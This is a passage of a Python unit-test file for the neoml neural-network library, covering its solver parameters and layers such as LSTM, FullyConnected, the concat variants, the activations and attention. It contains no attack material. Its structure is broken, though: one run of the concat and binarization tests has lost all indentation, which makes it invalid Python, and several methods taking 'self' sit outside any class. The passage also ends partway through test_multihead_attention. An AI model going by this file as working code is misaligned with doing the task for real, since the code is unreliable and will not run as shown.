        self.assertEqual(float_blob.size, 2 * 3 * 4 * 5 * 6 * 7)
        self.assertEqual(float_blob.object_count, 2 * 3)
        self.assertEqual(float_blob.object_size, 4 * 5 * 6 * 7)
class SolverTestCase(MultithreadedTestCase):
    """Tests that solver constructor arguments round-trip through properties.

    The three tests shared nearly identical assertion lists; the shared
    checks are factored into private helpers.
    """

    def _check_base_params(self, solver):
        # Parameters common to all solvers; every one is constructed as 0.6.
        self.assertAlmostEqual(solver.l1, 0.6, delta=1e-3)
        self.assertAlmostEqual(solver.l2, 0.6, delta=1e-3)
        self.assertAlmostEqual(solver.learning_rate, 0.6, delta=1e-3)
        self.assertAlmostEqual(solver.max_gradient_norm, 0.6, delta=1e-3)
        self.assertAlmostEqual(solver.moment_decay_rate, 0.6, delta=1e-3)

    def _check_second_moment_params(self, solver):
        # Extra parameters of the second-moment (Adam-style) solvers.
        self.assertAlmostEqual(solver.second_moment_decay_rate, 0.6, delta=1e-3)
        self.assertAlmostEqual(solver.epsilon, 0.6, delta=1e-3)
        self.assertEqual(solver.ams_grad, True)

    def test_nesterov_gradient(self):
        """NesterovGradient exposes all constructor parameters."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        solver = neoml.Dnn.NesterovGradient(math_engine, learning_rate=0.6, l1=0.6, l2=0.6,
                                            moment_decay_rate=0.6, max_gradient_norm=0.6,
                                            second_moment_decay_rate=0.6, epsilon=0.6, ams_grad=True)
        self._check_base_params(solver)
        self._check_second_moment_params(solver)

    def test_adaptive_gradient(self):
        """AdaptiveGradient exposes all constructor parameters."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        solver = neoml.Dnn.AdaptiveGradient(math_engine, learning_rate=0.6, l1=0.6, l2=0.6,
                                            moment_decay_rate=0.6, max_gradient_norm=0.6,
                                            second_moment_decay_rate=0.6, epsilon=0.6, ams_grad=True)
        self._check_base_params(solver)
        self._check_second_moment_params(solver)

    def test_simple_gradient(self):
        """SimpleGradient exposes its smaller parameter set."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        solver = neoml.Dnn.SimpleGradient(math_engine, learning_rate=0.6, l1=0.6, l2=0.6,
                                          moment_decay_rate=0.6, max_gradient_norm=0.6)
        self._check_base_params(solver)
class LayersTestCase(MultithreadedTestCase):
    def test_lstm(self):
        """Build a one-LSTM network, run it, and round-trip its properties."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source1 = neoml.Dnn.Source(dnn, "source1")
        # hidden_size=7, dropout=0.6
        lstm = neoml.Dnn.Lstm(source1, 7, 0.6, name="lstm")
        # The Lstm layer has two outputs; each gets its own sink.
        sink1 = neoml.Dnn.Sink((lstm, 0), "sink1")
        sink2 = neoml.Dnn.Sink((lstm, 1), "sink2")
        layer = dnn.layers['lstm']
        self.assertEqual(layer.name, 'lstm')
        # Input: 5 sequence steps, batch of 3, 16 channels.
        input1 = neoml.Blob.asblob(math_engine, np.ones((5, 3, 16), dtype=np.float32), (5, 3, 1, 1, 1, 1, 16))
        inputs = {"source1": input1}
        outputs = dnn.run(inputs)
        out1 = outputs["sink1"].asarray()
        out2 = outputs["sink2"].asarray()
        self.assertEqual(lstm.hidden_size, 7)
        self.assertEqual(layer.hidden_size, 7)
        # Properties are readable/writable through both the constructor
        # handle and the dnn.layers lookup.
        self.assertEqual(lstm.reverse_sequence, False)
        lstm.reverse_sequence = True
        self.assertEqual(lstm.reverse_sequence, True)
        self.assertEqual(layer.reverse_sequence, True)
        self.assertAlmostEqual(lstm.dropout, 0.6, delta=1e-3)
        lstm.dropout = 0.9
        self.assertAlmostEqual(lstm.dropout, 0.9, delta=1e-3)
        self.assertAlmostEqual(layer.dropout, 0.9, delta=1e-3)
        self.assertEqual(lstm.activation, "sigmoid")
        lstm.activation = "abs"
        self.assertEqual(lstm.activation, "abs")
        # Both outputs keep the (seq, batch, hidden_size) layout.
        self.assertEqual(out1.shape, (5, 3, 7))
        self.assertEqual(out2.shape, (5, 3, 7))
        # Round-trip each weight/free-term blob through getter and setter.
        w_blob = lstm.input_weights
        weights = w_blob.asarray()
        lstm.input_weights = w_blob
        f_blob = lstm.input_free_term
        free_term = f_blob.asarray()
        lstm.input_free_term = f_blob
        w_blob = lstm.recurrent_weights
        weights = w_blob.asarray()
        lstm.recurrent_weights = w_blob
        f_blob = lstm.recurrent_free_term
        free_term = f_blob.asarray()
        lstm.recurrent_free_term = f_blob
        # NOTE(review): only the recurrent weights/free term (the last
        # assignments) are shape-checked; 28 presumably equals
        # 4 gates * hidden_size — confirm against the Lstm docs.
        self.assertEqual(weights.shape, (28, 7))
        self.assertEqual(free_term.shape, (28,))
    def test_fully_connected(self):
        """Build a two-input FullyConnected layer and verify its behavior."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source1 = neoml.Dnn.Source(dnn, "source1")
        source2 = neoml.Dnn.Source(dnn, "source2")
        # element_count=5, zero_free_term=False.
        fully = neoml.Dnn.FullyConnected((source1, source2), 5, False, "fully")
        sink1 = neoml.Dnn.Sink((fully, 0), "sink1")
        sink2 = neoml.Dnn.Sink((fully, 1), "sink2")
        layer = dnn.layers['fully']
        self.assertEqual(layer.name, 'fully')
        # Two batches of different sizes (12 and 10) with 16 channels each.
        input1 = neoml.Blob.asblob(math_engine, np.ones((12, 16), dtype=np.float32), (12, 1, 1, 1, 1, 1, 16))
        input2 = neoml.Blob.asblob(math_engine, np.ones((10, 16), dtype=np.float32), (10, 1, 1, 1, 1, 1, 16))
        inputs = {"source1": input1, "source2": input2}
        outputs = dnn.run(inputs)
        out1 = outputs["sink1"].asarray()
        out2 = outputs["sink2"].asarray()
        self.assertEqual(fully.element_count, 5)
        self.assertEqual(layer.element_count, 5)
        # zero_free_term is readable/writable through both handles.
        self.assertEqual(fully.zero_free_term, False)
        fully.zero_free_term = True
        self.assertEqual(fully.zero_free_term, True)
        self.assertEqual(layer.zero_free_term, True)
        # Each output keeps its batch size; channels become element_count.
        self.assertEqual(out1.shape, (12, 5))
        self.assertEqual(out2.shape, (10, 5))
        # Round-trip weights and free term through getters and setters.
        w_blob = fully.weights
        weights = w_blob.asarray()
        fully.weights = w_blob
        f_blob = fully.free_term
        free_term = f_blob.asarray()
        fully.free_term = f_blob
        self.assertEqual(weights.shape, (5, 16))
        self.assertEqual(free_term.shape, (5,))
def test_concat_channels(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatChannels((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 1, 1, 1, 16))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 1, 1, 1, 16))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].channels, 32)
self.assertEqual(a.size, 32)
def test_concat_depth(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatDepth((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 1, 1, 16, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 1, 1, 16, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].depth, 32)
self.assertEqual(a.size, 32)
def test_concat_width(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatWidth((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 1, 16, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 1, 16, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].width, 32)
self.assertEqual(a.size, 32)
def test_concat_height(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatHeight((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 16, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 16, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].height, 32)
self.assertEqual(a.size, 32)
def test_concat_batch_width(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatBatchWidth((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 16, 1, 1, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 16, 1, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].batch_width, 32)
self.assertEqual(a.size, 32)
def test_concat_batch_length(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatBatchLength((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (16, 1, 1, 1, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((15), dtype=np.float32), (15, 1, 1, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].batch_len, 31)
self.assertEqual(a.size, 31)
def test_concat_list_size(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatListSize((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((15), dtype=np.float32), (1, 1, 15, 1, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 16, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].list_size, 31)
self.assertEqual(a.size, 31)
def test_concat_object(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
concat = neoml.Dnn.ConcatObject((source1, source2), "concat")
sink = neoml.Dnn.Sink(concat, "sink")
layer = dnn.layers['concat']
self.assertEqual(layer.name, 'concat')
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5), dtype=np.float32), (1, 1, 1, 2, 3, 4, 5))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 16, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(outputs["sink"].channels, 136)
self.assertEqual(a.size, 136)
def test_enum_binarization(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
bin = neoml.Dnn.EnumBinarization(source1, 5, "bin")
sink = neoml.Dnn.Sink(bin, "sink")
layer = dnn.layers['bin']
self.assertEqual(layer.name, 'bin')
self.assertEqual(bin.enum_size, 5)
bin.enum_size = 4
self.assertEqual(bin.enum_size, 4)
self.assertEqual(layer.enum_size, 4)
input1 = neoml.Blob.asblob(math_engine, np.ones((4, 3, 3, 3), dtype=np.float32), (4, 1, 1, 3, 3, 3, 1))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
a = outputs["sink"]
self.assertEqual(a.shape, (4, 1, 1, 3, 3, 3, 4))
def test_bitset_vectorization(self):
    """BitSetVectorization layer: bit_set_size round-trips and shapes the output channels."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src = neoml.Dnn.Source(net, "source1")
    vectorization = neoml.Dnn.BitSetVectorization(src, 5, "bin")
    sink = neoml.Dnn.Sink(vectorization, "sink")
    layer = net.layers['bin']
    self.assertEqual(layer.name, 'bin')
    self.assertEqual(vectorization.bit_set_size, 5)
    vectorization.bit_set_size = 4
    self.assertEqual(vectorization.bit_set_size, 4)
    # the proxy fetched via net.layers must see the same value
    self.assertEqual(layer.bit_set_size, 4)
    blob = neoml.Blob.asblob(engine, np.ones((4, 3, 3, 3), dtype=np.int32), (4, 1, 1, 3, 3, 3, 1))
    results = net.run({"source1": blob})
    self.assertEqual(results["sink"].shape, (4, 1, 1, 3, 3, 3, 4))
def test_dotproduct(self):
    """DotProduct layer: the dot product of two all-ones 16-vectors equals 16."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    dot = neoml.Dnn.DotProduct((src1, src2), "dotProduct")
    sink = neoml.Dnn.Sink(dot, "sink")
    layer = net.layers['dotProduct']
    self.assertEqual(layer.name, 'dotProduct')
    blob1 = neoml.Blob.asblob(engine, np.ones((16,), dtype=np.float32), (1, 1, 1, 1, 1, 1, 16))
    blob2 = neoml.Blob.asblob(engine, np.ones((16,), dtype=np.float32), (1, 1, 1, 1, 1, 1, 16))
    res = net.run({"source1": blob1, "source2": blob2})["sink"].asarray()
    self.assertEqual(res.size, 1)
    self.assertEqual(res[0], 16)
def test_dropout(self):
    """Dropout layer: output keeps the input shape; properties round-trip."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src = neoml.Dnn.Source(net, "source")
    dropout = neoml.Dnn.Dropout(src, 0.5, True, True, "dropout")
    sink = neoml.Dnn.Sink(dropout, "sink")
    layer = net.layers['dropout']
    self.assertEqual(layer.name, 'dropout')
    blob = neoml.Blob.asblob(engine, np.ones((2, 3, 5, 4), dtype=np.float32), (2, 3, 1, 5, 1, 1, 4))
    res = net.run({"source": blob})["sink"].asarray()
    self.assertEqual(res.shape, blob.asarray().shape)
    # constructor arguments must be visible both on the wrapper and the proxy
    self.assertEqual(dropout.rate, 0.5)
    self.assertEqual(dropout.spatial, True)
    self.assertEqual(dropout.batchwise, True)
    self.assertEqual(layer.rate, 0.5)
def test_accumulative_lookup(self):
    """AccumulativeLookup layer: count/size properties and output shape (2, 6)."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src = neoml.Dnn.Source(net, "source")
    lookup = neoml.Dnn.AccumulativeLookup(src, 5, 6, "lookup")
    sink = neoml.Dnn.Sink(lookup, "sink")
    layer = net.layers['lookup']
    self.assertEqual(layer.name, 'lookup')
    self.assertEqual(lookup.size, 6)
    self.assertEqual(lookup.count, 5)
    blob = neoml.Blob.asblob(engine, np.ones((2, 5, 3), dtype=np.int32), (2, 1, 1, 5, 1, 1, 3))
    res = net.run({"source": blob})["sink"].asarray()
    self.assertEqual(res.shape, (2, 6))
def test_multichannel_lookup(self):
    """MultichannelLookup layer: dimensions round-trip, run, and embeddings access."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src = neoml.Dnn.Source(net, "source")
    lookup = neoml.Dnn.MultichannelLookup((src,), [(1, 4)], "lookup")
    sink = neoml.Dnn.Sink(lookup, "sink")
    layer = net.layers['lookup']
    self.assertEqual(layer.name, 'lookup')
    self.assertEqual(lookup.dimensions, [(1, 4)])
    lookup.dimensions = [(3, 5)]
    self.assertEqual(layer.dimensions, [(3, 5)])
    blob = neoml.Blob.asblob(engine, np.ones((2, 5, 3), dtype=np.float32), (2, 1, 1, 5, 1, 1, 3))
    res = net.run({"source": blob})["sink"].asarray()
    self.assertEqual(res.shape, (2, 5, 7))
    # embeddings table can be read back, written, and re-initialized
    table = lookup.get_embeddings(0)
    lookup.set_embeddings(0, table)
    lookup.initialize(neoml.Dnn.Uniform())
def test_tied_embeddings(self):
    """TiedEmbeddings layer: channel and embeddings_layer_name properties round-trip."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src = neoml.Dnn.Source(net, "source")
    tied = neoml.Dnn.TiedEmbeddings((src,), "embeddings", 0, "tied")
    sink = neoml.Dnn.Sink(tied, "sink")
    layer = net.layers['tied']
    self.assertEqual(layer.name, 'tied')
    self.assertEqual(tied.channel, 0)
    tied.channel = 1
    self.assertEqual(tied.channel, 1)
    # the proxy fetched via net.layers must see the same value
    self.assertEqual(layer.channel, 1)
    self.assertEqual(tied.embeddings_layer_name, "embeddings")
    tied.embeddings_layer_name = "embeddings2"
    self.assertEqual(tied.embeddings_layer_name, "embeddings2")
def test_accuracy(self):
    """Accuracy layer: identical prediction/label inputs score 1.0."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    accuracy = neoml.Dnn.Accuracy((src1, src2), True, "accuracy")
    sink = neoml.Dnn.Sink(accuracy, "sink")
    layer = net.layers['accuracy']
    self.assertEqual(layer.name, 'accuracy')
    self.assertEqual(accuracy.reset, True)
    self.assertEqual(layer.reset, True)
    blob1 = neoml.Blob.asblob(engine, np.ones((1, 16), dtype=np.float32), (1, 16, 1, 1, 1, 1, 1))
    blob2 = neoml.Blob.asblob(engine, np.ones((1, 16), dtype=np.float32), (1, 16, 1, 1, 1, 1, 1))
    res = net.run({"source1": blob1, "source2": blob2})["sink"].asarray()
    self.assertEqual(res.size, 1)
    self.assertAlmostEqual(res[0], 1.0, delta=1e-3)
def test_confusion_matrix(self):
    """ConfusionMatrix layer: 2-class matrix shape and the all-correct cell count."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    confusion = neoml.Dnn.ConfusionMatrix((src1, src2), True, "accuracy")
    sink = neoml.Dnn.Sink(confusion, "sink")
    layer = net.layers['accuracy']
    self.assertEqual(layer.name, 'accuracy')
    self.assertEqual(confusion.reset, True)
    self.assertEqual(layer.reset, True)
    blob1 = neoml.Blob.asblob(engine, np.ones((16, 2), dtype=np.float32), (1, 16, 1, 1, 1, 1, 2))
    blob2 = neoml.Blob.asblob(engine, np.ones((16, 2), dtype=np.float32), (1, 16, 1, 1, 1, 1, 2))
    res = net.run({"source1": blob1, "source2": blob2})["sink"].asarray()
    self.assertEqual(confusion.matrix.shape, (2, 2))
    self.assertEqual(res.size, 4)
    # all 16 objects fall into the same cell of the matrix
    self.assertAlmostEqual(res[0][0], 16.0, delta=1e-3)
def _test_activation(self, layer, kwargs=None):
    """Build a one-activation network, run it on an all-ones input and return the output.

    layer  -- name of the activation class inside neoml.Dnn (e.g. 'ReLU')
    kwargs -- optional dict of constructor keyword values; each one is also
              verified against the layer properties after construction
    Returns the sink output as a numpy array.
    """
    # Bug fix: the original default `kwargs={}` was a mutable default argument,
    # shared between all calls of the method; use the None sentinel instead.
    kwargs = {} if kwargs is None else kwargs
    math_engine = neoml.MathEngine.CpuMathEngine(1)
    dnn = neoml.Dnn.Dnn(math_engine)
    source = neoml.Dnn.Source(dnn, "source")
    activation = getattr(neoml.Dnn, layer)(source, name="activation", **kwargs)
    sink = neoml.Dnn.Sink(activation, "sink")
    # Bug fix: keep the layer proxy in its own variable instead of shadowing the
    # `layer` parameter, so the failure message below can report the class name.
    layer_proxy = dnn.layers['activation']
    self.assertEqual(layer_proxy.name, 'activation')
    input = neoml.Blob.asblob(math_engine, np.ones((1, 16), dtype=np.float32), (1, 16, 1, 1, 1, 1, 1))
    inputs = {"source": input}
    outputs = dnn.run(inputs)
    out = outputs["sink"].asarray()
    for k, v in kwargs.items():
        self.assertAlmostEqual(getattr(activation, k), v, delta=1e-3,
            msg='Field {} of {} activation differs'.format(k, layer))
        # the proxy fetched via dnn.layers must agree with the wrapper
        self.assertEqual(getattr(activation, k), getattr(layer_proxy, k))
    return out
def test_activation_linear(self):
    """Linear activation: 1 * 3.3 + 4.4 == 7.7."""
    res = self._test_activation('Linear', {'multiplier': 3.3, 'free_term': 4.4})
    self.assertTrue(np.allclose(res, 7.7))
def test_activation_elu(self):
    """ELU activation: positive input (1) passes through unchanged."""
    res = self._test_activation('ELU', {'alpha': 3.3})
    self.assertTrue(np.allclose(res, 1))
def test_activation_relu(self):
    """ReLU activation with threshold: input of 1 maps to 1."""
    res = self._test_activation('ReLU', {'threshold': 3.3})
    self.assertTrue(np.allclose(res, 1))
def test_activation_leaky_relu(self):
    """LeakyReLU activation: positive input (1) passes through unchanged."""
    res = self._test_activation('LeakyReLU', {'alpha': 3.3})
    self.assertTrue(np.allclose(res, 1))
def test_activation_hswish(self):
    """HSwish activation: h-swish(1) == 1 * (1 + 3) / 6 == 2/3."""
    res = self._test_activation('HSwish')
    self.assertTrue(np.allclose(res, 2./3))
def test_activation_gelu(self):
    """GELU activation: expected value at x == 1."""
    res = self._test_activation('GELU')
    self.assertTrue(np.allclose(res, 0.84579575))
def test_activation_abs(self):
    """Abs activation: |1| == 1."""
    res = self._test_activation('Abs')
    self.assertTrue(np.allclose(res, 1))
def test_activation_sigmoid(self):
    """Sigmoid activation: sigmoid(1) == 0.7310586."""
    res = self._test_activation('Sigmoid')
    self.assertTrue(np.allclose(res, 0.7310586))
def test_activation_tanh(self):
    """Tanh activation: tanh(1) == 0.7615942."""
    res = self._test_activation('Tanh')
    self.assertTrue(np.allclose(res, 0.7615942))
def test_activation_hardtanh(self):
    """HardTanh activation: input of 1 stays at 1."""
    res = self._test_activation('HardTanh')
    self.assertTrue(np.allclose(res, 1))
def test_activation_hardsigmoid(self):
    """HardSigmoid activation: 1 * 5.5 + 6.6 saturates at 1."""
    res = self._test_activation('HardSigmoid', {'slope': 5.5, 'bias': 6.6})
    self.assertTrue(np.allclose(res, 1))
def test_activation_power(self):
    """Power activation: 1 ** 5.5 == 1."""
    res = self._test_activation('Power', {'exponent': 5.5})
    self.assertTrue(np.allclose(res, 1))
def test_add_object(self):
    """AddToObject layer: the second input is added to every object of the first."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    add_to_object = neoml.Dnn.AddToObject((src1, src2), "add_to_object")
    sink = neoml.Dnn.Sink(add_to_object, "sink")
    layer = net.layers['add_to_object']
    self.assertEqual(layer.name, 'add_to_object')
    blob1 = neoml.Blob.asblob(engine, np.ones((8, 4, 4), dtype=np.float32), (1, 8, 1, 4, 4, 1, 1))
    blob2 = neoml.Blob.asblob(engine, np.ones((4, 4), dtype=np.float32), (1, 1, 1, 4, 4, 1, 1))
    res = net.run({"source1": blob1, "source2": blob2})["sink"].asarray()
    self.assertEqual(res.size, 128)
    # 1 + 1 everywhere
    self.assertAlmostEqual(res[1][1][1], 2.0, delta=1e-3)
def test_argmax(self):
    """Argmax layer: dimension property round-trips; argmax of [1,2,3,1] is 2."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src = neoml.Dnn.Source(net, "source")
    argmax = neoml.Dnn.Argmax(src, dimension="channels", name="argmax")
    sink = neoml.Dnn.Sink(argmax, "sink")
    layer = net.layers['argmax']
    self.assertEqual(layer.name, 'argmax')
    self.assertEqual(argmax.dimension, "channels")
    argmax.dimension = "batch_length"
    self.assertEqual(argmax.dimension, "batch_length")
    blob = neoml.Blob.asblob(engine, np.array([1, 2, 3, 1], dtype=np.float32), (4, 1, 1, 1, 1, 1, 1))
    res = net.run({"source": blob})["sink"].asarray()
    self.assertEqual(res, 2)
def test_attention_decoder(self):
    """AttentionDecoder layer: score mode and size properties round-trip; smoke run."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    decoder = neoml.Dnn.AttentionDecoder((src1, src2), "additive", 16, 32, 64, "decoder")
    sink = neoml.Dnn.Sink(decoder, "sink")
    layer = net.layers['decoder']
    self.assertEqual(layer.name, 'decoder')
    # constructor arguments must be reflected in the properties
    self.assertEqual(decoder.hidden_layer_size, 16)
    self.assertEqual(decoder.output_object_size, 32)
    self.assertEqual(decoder.output_seq_len, 64)
    self.assertEqual(decoder.score, "additive")
    # the score mode can be switched back and forth
    decoder.score = "dot_product"
    self.assertEqual(decoder.score, "dot_product")
    decoder.score = "additive"
    # every size setter must also be visible through the net.layers proxy
    decoder.hidden_layer_size = 1
    self.assertEqual(decoder.hidden_layer_size, 1)
    self.assertEqual(layer.hidden_layer_size, 1)
    decoder.output_object_size = 1
    self.assertEqual(decoder.output_object_size, 1)
    self.assertEqual(layer.output_object_size, 1)
    decoder.output_seq_len = 1
    self.assertEqual(decoder.output_seq_len, 1)
    self.assertEqual(layer.output_seq_len, 1)
    blob1 = neoml.Blob.asblob(engine, np.ones(1, dtype=np.float32), (1, 1, 1, 1, 1, 1, 1))
    blob2 = neoml.Blob.asblob(engine, np.ones(1, dtype=np.float32), (1, 1, 1, 1, 1, 1, 1))
    res = net.run({"source1": blob1, "source2": blob2})["sink"].asarray()
    self.assertSequenceEqual(res, [1])
def test_batch_norm(self):
    """BatchNormalization layer: constant ones stay unchanged; properties round-trip."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src = neoml.Dnn.Source(net, "source")
    batch_norm = neoml.Dnn.BatchNormalization(src, True, True, 0.3, "batch_norm")
    sink = neoml.Dnn.Sink(batch_norm, "sink")
    layer = net.layers['batch_norm']
    self.assertEqual(layer.name, 'batch_norm')
    data = np.ones((5, 3, 2), dtype=np.float32)
    blob = neoml.Blob.asblob(engine, data, (5, 1, 3, 2, 1, 1, 1))
    res = net.run({"source": blob})["sink"].asarray()
    self.assertTrue(np.array_equal(data, res))
    # constructor arguments are visible both on the wrapper and the proxy
    self.assertEqual(batch_norm.channel_based, True)
    self.assertEqual(batch_norm.zero_free_term, True)
    self.assertAlmostEqual(batch_norm.slow_convergence_rate, 0.3, delta=1e-3)
    self.assertEqual(layer.channel_based, True)
    self.assertEqual(layer.zero_free_term, True)
    self.assertAlmostEqual(layer.slow_convergence_rate, 0.3, delta=1e-3)
def test_matrix_multiplication(self):
    """MatrixMultiplication layer: smoke run on two 2x2 operands."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    mult = neoml.Dnn.MatrixMultiplication((src1, src2), "mm")
    sink = neoml.Dnn.Sink(mult, "sink")
    layer = net.layers['mm']
    self.assertEqual(layer.name, 'mm')
    lhs = np.array([[1, 2], [3, 4]], dtype=np.float32)
    rhs = np.array([[1, 2], [3, 4]], dtype=np.float32)
    blob1 = neoml.Blob.asblob(engine, lhs, (2, 1, 2, 1, 1, 1, 1))
    blob2 = neoml.Blob.asblob(engine, rhs, (2, 1, 2, 1, 1, 1, 1))
    res = net.run({"source1": blob1, "source2": blob2})["sink"].asarray()
    # with these blob dims each row is a 1x2 "matrix", so the expected result
    # matches the elementwise product of the two arrays
    self.assertTrue(np.array_equal(res, lhs * rhs))
def test_multihead_attention(self):
    """MultiheadAttention layer: all properties round-trip; output is (4, 3, 8)."""
    engine = neoml.MathEngine.CpuMathEngine(1)
    net = neoml.Dnn.Dnn(engine)
    src1 = neoml.Dnn.Source(net, "source1")
    src2 = neoml.Dnn.Source(net, "source2")
    src3 = neoml.Dnn.Source(net, "source3")
